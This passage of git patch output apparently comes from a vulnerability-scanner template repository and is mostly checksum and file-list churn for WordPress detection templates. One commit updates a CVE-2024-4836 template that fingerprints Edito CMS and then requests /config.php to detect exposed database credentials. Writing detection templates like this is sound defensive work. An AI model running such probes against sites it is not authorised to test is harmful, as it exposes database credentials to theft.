-http/technologies/wordpress/plugins/simple-history.yaml:7c57691a0f5e6647403f23a25c9b2df1fdb61b04 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:b5fef0f366e303803c01b936add915f899aea831 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:5958a4fddf53a6e158f93c7adf7dce2efdeb020f -http/technologies/wordpress/plugins/smart-slider-3.yaml:c816ee91369e63dc009dd1d2a3a796674f392abe -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:a7110001ecb3db87cda6226123799c4a0718b84a +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:9112e82604dbf562fb05644cce2915a0ea15e905 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:492c2253a301a7a8f79f4c32ab784e08122dda5a -http/technologies/wordpress/plugins/sucuri-scanner.yaml:857179c058a6fd03516a7553ff27eb026b9cee62 -http/technologies/wordpress/plugins/svg-support.yaml:fb56aa1a7041dfcfc803a6e57971d7d33327bef1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:361138178073f61fde4d3feed431331bb12ace69 -http/technologies/wordpress/plugins/tablepress.yaml:f9fabba7c3d65d7a1072a540da7b0df76731b535 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:32c858bc7535186aa3d5f27588f121adb736c7bc -http/technologies/wordpress/plugins/templately.yaml:4d96de54404d6f65335bf5e204ea2bc07b5b94cf -http/technologies/wordpress/plugins/the-events-calendar.yaml:97ef2c15401bc4916d93d335b3bb6cdce532234d +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:f520151fb8af6edd1e198aa76065e994442dbc5e -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:84b23cae261bb58dab2994fba7c2ddd7c350930f -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:690dc9855663c07d556a10681a2b7e75fbc2abd8 -http/technologies/wordpress/plugins/under-construction-page.yaml:67d72772817390ebc99d0c263b384ea080ac373e +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:c6e292ecd63ae10bf93e5979d35415d8ffd85545 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:a8dc24909ddf8491a8cf3bf3965ad309fdcf3897 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:5ab0b65082aef0b46be6831cee035abbd6254271 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:425676f7c8686310813444d22803ebddbe9eac1e -http/technologies/wordpress/plugins/webp-express.yaml:1c1df4bfe1eed6b92669b62239a595097c7c9f06 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:cf94ccf6f7ae9a9674deb0ef0df1d39a4955c264 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:d729189ac12d41d85767166a54b4f77d7f67864a -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:759a5a90599017ab14a6c7821b386fe7736fd5e4 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:6e03eb051cf136692d4a57886adcdbad3c7a8169 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:b19bd7b0c34ee7522b994c229ee27e5e07368303 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:eb108ffa255631dd481cf120eb67f74c0650841b -http/technologies/wordpress/plugins/woocommerce-payments.yaml:6fe485a1f7fa3919a0b404b2fabc56b5e7db93c2 -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:5a715e0325aa2d72a87207fc713c02e11d66e315 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:0ccc50ed6c1c0f1a8dba9b6870547b9981bc398b -http/technologies/wordpress/plugins/woocommerce-services.yaml:59bd173c4f49d796cd24618b8031ed1c766e297d -http/technologies/wordpress/plugins/woocommerce.yaml:983775e0f00646285de9b7b0d00f9a12e94e8f31 -http/technologies/wordpress/plugins/wordfence.yaml:dbade4de76461aaab09659a41d2ca5ba62957b54 -http/technologies/wordpress/plugins/wordpress-importer.yaml:bd0db951991b3913038269dfa5ce2a96896a65e3 -http/technologies/wordpress/plugins/wordpress-seo.yaml:4d95ae858642b37927c52bc015818adcdaad22d2 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:2d332101ed7dd504e1c98b5febacd35f292704a8 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:100484cc79cbc52a27843b6400cc08f305242029 -http/technologies/wordpress/plugins/wp-file-manager.yaml:abe902c8cc771247685a62d3d62f528a13e8f140 -http/technologies/wordpress/plugins/wp-google-maps.yaml:ddb29311f43fc1737c4d2317a4e11bc8c2b2a95d -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:4a7d2de0a8da6dddc6c5b1dc4e128f3693fbe835 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:41652457399072aa48177e65195d3965edb39c91 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:34bba16838de32fe0a997635c1bbab991f8c40e3 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:4219b60cb3a0a94f18e156518195a04041e94274 -http/technologies/wordpress/plugins/wp-optimize.yaml:f2c4a1cff4f1856b45636fcd531f8828c229e3c6 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:9202a116162f7b53cde137e122112556786b2d8c -http/technologies/wordpress/plugins/wp-reset.yaml:9a4dbec902cd06dc5aa937a2ab7268b1085321a1 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:e24eb8d192298263cf526df58b7fca04d0ed4d31 -http/technologies/wordpress/plugins/wp-rollback.yaml:1727b3cd3106c06b092bb36fcfbebe9ba88092a6 -http/technologies/wordpress/plugins/wp-seopress.yaml:ebd84bcc71e617993b3ef8d5f26e48171a24a1fb -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:cad2da672c42cde5b953b2dfbf94bb22e23fc257 -http/technologies/wordpress/plugins/wp-smushit.yaml:d387f4958c03e4d3020e392f2c48e0c04403fb30 -http/technologies/wordpress/plugins/wp-statistics.yaml:edb6ace1f087b200410fcc8a724b1e874fab89cf -http/technologies/wordpress/plugins/wp-super-cache.yaml:ce68136fae12f929a9509829f25019f2b6ba8358 +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:3313b39a211417f628e8e5920f936066fb87bf97 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:a7d63a6793e1c946f72b5dc3dda5b9837e99c65f -http/technologies/wordpress/plugins/wpforms-lite.yaml:103f644974060042064a470137a38f3f5a94d62c -http/technologies/wordpress/plugins/wps-hide-login.yaml:e385d537742f603f56fdf6d6d62e60f012dabb26 -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:78c87e2887bff717fefc229841bb92bad7eedf97 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:1fcff3d3b881c0f9dcf700cf7751c5297ee289ce +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:1066f489d18cea148a075d3f6d2ad3398ed00356 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8848,7 +8848,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:6fc7014d1005d9a1c0f68f4398ee7b9d568b2cd6 +templates-checksum.txt:e4da9df4127f0af0572f6a9d1f225965fc25a50a wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 2f82d89291052ccc8790ee9d412bd67a9480865a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 9 Jul 2024 14:17:13 +0530 Subject: [PATCH 0996/1841] added flow and matchers --- http/cves/2024/CVE-2024-4836.yaml | 21 +++++++++++++++++---- 1 file changed, 17 insertions(+), 4 deletions(-) diff --git a/http/cves/2024/CVE-2024-4836.yaml b/http/cves/2024/CVE-2024-4836.yaml index da30b2e2b2..c1dfb0a899 100644 --- a/http/cves/2024/CVE-2024-4836.yaml +++ b/http/cves/2024/CVE-2024-4836.yaml @@ -11,12 +11,25 @@ info: - https://github.com/sleep46/CVE-2024-4836_Check - https://nvd.nist.gov/vuln/detail/CVE-2024-4836 metadata: - verified: "true" - max-request: 1 - fofa-query: "Edito CMS" + max-request: 5 + fofa-query: icon_hash="1491301339" tags: cve,cve2024,cms,edito,info-leak +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + dsl: + - 'contains_any(body,"content=\"edito", "www.edito.pl")' + - 'status_code==200' + condition: and + internal: true + - method: GET path: - "{{BaseURL}}/config.php" @@ -27,6 +40,6 @@ http: matchers: - type: dsl dsl: - - 'contains(body,"db_password")' + - 'contains_all(body,"db_password", "db_username")' - 'status_code==200' condition: and From 9629031d75987cb95a2cdb90c8ffdda6dd7d1d75 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 9 Jul 2024 08:48:12 +0000 Subject: [PATCH 0997/1841] Auto Template Signing [Tue Jul 9 08:48:11 UTC 2024] :robot: --- http/cves/2023/CVE-2023-47117.yaml | 1 + http/misconfiguration/label-studio-signup.yaml | 1 + http/technologies/apache/tomcat-detect.yaml | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 + http/technologies/wordpress/plugins/add-to-any.yaml | 1 + http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 + http/technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 + http/technologies/wordpress/plugins/akismet.yaml | 1 + http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 + .../technologies/wordpress/plugins/all-in-one-wp-migration.yaml | 1 + .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 + http/technologies/wordpress/plugins/amp.yaml | 1 + http/technologies/wordpress/plugins/antispam-bee.yaml | 1 + http/technologies/wordpress/plugins/astra-sites.yaml | 1 + http/technologies/wordpress/plugins/autoptimize.yaml | 1 + http/technologies/wordpress/plugins/backwpup.yaml | 1 + http/technologies/wordpress/plugins/better-search-replace.yaml | 1 + http/technologies/wordpress/plugins/better-wp-security.yaml | 1 + .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 + http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 + http/technologies/wordpress/plugins/breeze.yaml | 1 + http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 + http/technologies/wordpress/plugins/chaty.yaml | 1 + .../wordpress/plugins/child-theme-configurator.yaml | 1 + http/technologies/wordpress/plugins/classic-editor.yaml | 1 + http/technologies/wordpress/plugins/classic-widgets.yaml | 1 + .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 + http/technologies/wordpress/plugins/cmb2.yaml | 1 + http/technologies/wordpress/plugins/coblocks.yaml | 1 + http/technologies/wordpress/plugins/code-snippets.yaml | 1 + http/technologies/wordpress/plugins/coming-soon.yaml | 1 + http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 + .../technologies/wordpress/plugins/contact-form-7-honeypot.yaml | 1 + http/technologies/wordpress/plugins/contact-form-7.yaml | 1 + http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 + http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 + http/technologies/wordpress/plugins/cookie-notice.yaml | 1 + http/technologies/wordpress/plugins/copy-delete-posts.yaml | 1 + http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 + .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 + http/technologies/wordpress/plugins/custom-css-js.yaml | 1 + http/technologies/wordpress/plugins/custom-fonts.yaml | 1 + http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 + http/technologies/wordpress/plugins/disable-comments.yaml | 1 + http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 + http/technologies/wordpress/plugins/duplicate-page.yaml | 1 + http/technologies/wordpress/plugins/duplicate-post.yaml | 1 + http/technologies/wordpress/plugins/duplicator.yaml | 1 + .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 + http/technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 + http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 + http/technologies/wordpress/plugins/elementor.yaml | 1 + http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 + http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 + http/technologies/wordpress/plugins/envato-elements.yaml | 1 + .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 + http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 + .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 + .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 + http/technologies/wordpress/plugins/flamingo.yaml | 1 + http/technologies/wordpress/plugins/fluentform.yaml | 1 + http/technologies/wordpress/plugins/font-awesome.yaml | 1 + .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/formidable.yaml | 1 + http/technologies/wordpress/plugins/forminator.yaml | 1 + http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 + http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 + .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 + .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 + .../technologies/wordpress/plugins/google-listings-and-ads.yaml | 1 + http/technologies/wordpress/plugins/google-site-kit.yaml | 1 + .../wordpress/plugins/google-sitemap-generator.yaml | 1 + http/technologies/wordpress/plugins/gtranslate.yaml | 1 + http/technologies/wordpress/plugins/gutenberg.yaml | 1 + http/technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 + .../wordpress/plugins/header-footer-code-manager.yaml | 1 + .../technologies/wordpress/plugins/header-footer-elementor.yaml | 1 + http/technologies/wordpress/plugins/header-footer.yaml | 1 + http/technologies/wordpress/plugins/health-check.yaml | 1 + http/technologies/wordpress/plugins/hello-dolly.yaml | 1 + http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 + http/technologies/wordpress/plugins/hostinger.yaml | 1 + http/technologies/wordpress/plugins/image-optimization.yaml | 1 + http/technologies/wordpress/plugins/imagify.yaml | 1 + http/technologies/wordpress/plugins/imsanity.yaml | 1 + .../wordpress/plugins/insert-headers-and-footers.yaml | 1 + http/technologies/wordpress/plugins/instagram-feed.yaml | 1 + .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 + http/technologies/wordpress/plugins/jetpack.yaml | 1 + http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 + http/technologies/wordpress/plugins/kirki.yaml | 1 + http/technologies/wordpress/plugins/leadin.yaml | 1 + .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 + http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 + http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 + http/technologies/wordpress/plugins/loco-translate.yaml | 1 + http/technologies/wordpress/plugins/loginizer.yaml | 1 + .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 + http/technologies/wordpress/plugins/mailpoet.yaml | 1 + http/technologies/wordpress/plugins/maintenance.yaml | 1 + http/technologies/wordpress/plugins/mainwp-child.yaml | 1 + http/technologies/wordpress/plugins/malcare-security.yaml | 1 + http/technologies/wordpress/plugins/megamenu.yaml | 1 + http/technologies/wordpress/plugins/members.yaml | 1 + http/technologies/wordpress/plugins/meta-box.yaml | 1 + http/technologies/wordpress/plugins/metform.yaml | 1 + http/technologies/wordpress/plugins/ml-slider.yaml | 1 + http/technologies/wordpress/plugins/newsletter.yaml | 1 + .../wordpress/plugins/nextend-facebook-connect.yaml | 1 + http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 + http/technologies/wordpress/plugins/ninja-forms.yaml | 1 + http/technologies/wordpress/plugins/ocean-extra.yaml | 1 + .../technologies/wordpress/plugins/official-facebook-pixel.yaml | 1 + http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 + http/technologies/wordpress/plugins/optinmonster.yaml | 1 + http/technologies/wordpress/plugins/otter-blocks.yaml | 1 + http/technologies/wordpress/plugins/password-protected.yaml | 1 + http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 + .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 + http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 + http/technologies/wordpress/plugins/polylang.yaml | 1 + http/technologies/wordpress/plugins/popup-maker.yaml | 1 + http/technologies/wordpress/plugins/post-smtp.yaml | 1 + http/technologies/wordpress/plugins/post-types-order.yaml | 1 + .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 + http/technologies/wordpress/plugins/pretty-link.yaml | 1 + http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 + http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 + http/technologies/wordpress/plugins/redirection.yaml | 1 + http/technologies/wordpress/plugins/redux-framework.yaml | 1 + http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 + http/technologies/wordpress/plugins/royal-elementor-addons.yaml | 1 + http/technologies/wordpress/plugins/safe-svg.yaml | 1 + http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 + http/technologies/wordpress/plugins/sg-cachepress.yaml | 1 + http/technologies/wordpress/plugins/sg-security.yaml | 1 + http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 + .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 + .../wordpress/plugins/simple-custom-post-order.yaml | 1 + http/technologies/wordpress/plugins/simple-history.yaml | 1 + http/technologies/wordpress/plugins/siteguard.yaml | 1 + http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 + http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 + http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 + .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 + .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 + http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 + http/technologies/wordpress/plugins/svg-support.yaml | 1 + http/technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 + http/technologies/wordpress/plugins/tablepress.yaml | 1 + http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 + http/technologies/wordpress/plugins/templately.yaml | 1 + http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 + http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 + .../wordpress/plugins/translatepress-multilingual.yaml | 1 + .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 + .../technologies/wordpress/plugins/under-construction-page.yaml | 1 + http/technologies/wordpress/plugins/updraftplus.yaml | 1 + http/technologies/wordpress/plugins/user-role-editor.yaml | 1 + http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 + .../wordpress/plugins/webp-converter-for-media.yaml | 1 + http/technologies/wordpress/plugins/webp-express.yaml | 1 + .../wordpress/plugins/widget-importer-exporter.yaml | 1 + .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 + .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 + http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 + .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 + .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 + http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 + 